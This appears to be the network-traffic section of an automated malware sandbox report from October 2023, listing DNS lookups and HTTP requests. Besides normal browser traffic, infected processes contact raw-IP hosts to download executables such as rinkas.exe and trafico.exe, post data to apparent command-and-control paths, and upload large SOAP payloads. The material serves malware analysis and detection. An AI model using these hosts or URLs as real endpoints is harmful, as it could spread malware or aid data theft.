IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.30.27
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

27.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.30.240.157.in-addr.arpa

IN PTR

Response

27.30.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-prg1fbcdnnet
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.30.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.30.35
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.206
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.250.179.206:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

100.39.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.39.251.142.in-addr.arpa

IN PTR

Response

100.39.251.142.in-addr.arpa

IN PTR

ams15s48-in-f41e100net
DNS

35.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.30.240.157.in-addr.arpa

IN PTR

Response

35.30.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-prg1facebookcom
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.30.35
DNS

206.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.179.250.142.in-addr.arpa

IN PTR

Response

206.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f141e100net
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tpkoxxp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 350
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cxkiqg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 339
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cpcjjnyjyx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 317
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xwpwgvkui.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 312
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tfmdtwwsa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://duwxhv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 201
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hpnjj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 114
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xwvqwx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 250
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qyydit.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cavqdnm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dakey.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 264
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://odcbh.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wcbag.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 220
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tracx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 137
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 40
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.211/loghub/master

AppLaunch.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=UPqVsXcA9azofxFxwwza
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 02:56:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Oct 2023 02:56:42 GMT
Content-Type: application/octet-stream
Content-Length: 15877632
Last-Modified: Tue, 10 Oct 2023 16:08:19 GMT
Connection: keep-alive
ETag: "652576f3-f24600"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

254.178.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.178.238.8.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:56:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

158.240.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

158.240.127.40.in-addr.arpa

IN PTR

Response
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yfnbgpgwha.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 313
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jdbqd.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 223
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:56:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qivdfgjrni.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cnfjnj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 128
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jehcjgl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 278
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mmfdkpqtn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 333
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ejqqakawv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 327
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eoqbuw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 146
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jofqkhrqdj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Wed, 11 Oct 2023 02:57:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://185.216.70.222/trafico.exe

Explorer.EXE

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:56:56 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 13:49:38 GMT
ETag: "6b400-6075cfa598c47"
Accept-Ranges: bytes
Content-Length: 439296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
POST

http://85.209.176.171/

34B0.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 02:57:05 GMT
POST

http://85.209.176.171/

34B0.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 02:57:10 GMT
POST

http://85.209.176.171/

34B0.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 1563639
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 02:57:19 GMT
POST

http://85.209.176.171/

34B0.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 85.209.176.171
Content-Length: 1563631
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 02:57:21 GMT
DNS

pastebin.com

explorer.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

104.20.68.143
DNS

pastebin.com

explorer.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

104.20.68.143
GET

https://pastebin.com/raw/8baCJyMF

32DB.exe

Remote address:

172.67.34.170:443

Request

GET /raw/8baCJyMF HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:05 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 837
Last-Modified: Wed, 11 Oct 2023 02:43:08 GMT
Server: cloudflare
CF-RAY: 8143d56909d20bb6-AMS
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

tak.soydet.top

32DB.exe

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

182.246.217.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.246.217.95.in-addr.arpa

IN PTR

Response

182.246.217.95.in-addr.arpa

IN PTR

static18224621795clientsyour-serverde
DNS

api.ip.sb

34B0.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31
GET

https://api.ip.sb/geoip

34B0.exe

Remote address:

172.67.75.172:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UBZN%2F%2Fivh%2B%2BoNsVw53hLFZrSdaZIuO71dk0MeqhEgRyZFlargYPbYxFKLqz9aBeK%2FSfT0KuYT29OnpY6yoQQlDd5Nviw7XK6JgAwfKZOqCalf2wh3Scc6OV6SA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8143d58a6992670e-AMS
alt-svc: h3=":443"; ma=86400
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

172.67.212.39

bytecloudasa.website

IN A

104.21.61.162
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=62DD%2FBnlzUZc3FLBujOgo8yRUdg8ABGCdFq3OYIoPd3m%2BhKaB4RSVviV3iAVFmXe9%2Bn4VvNiBoTecV%2B4QEClqsFe2N9DmIEwiWTqthAML0ONwulVv%2BLFyGrIUaQkZ9jGJ9r84GHJVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d596ebdfb8ba-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=m9eaqc880p4fp66djk9glsh0nf; expires=Sat, 03 Feb 2024 20:43:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
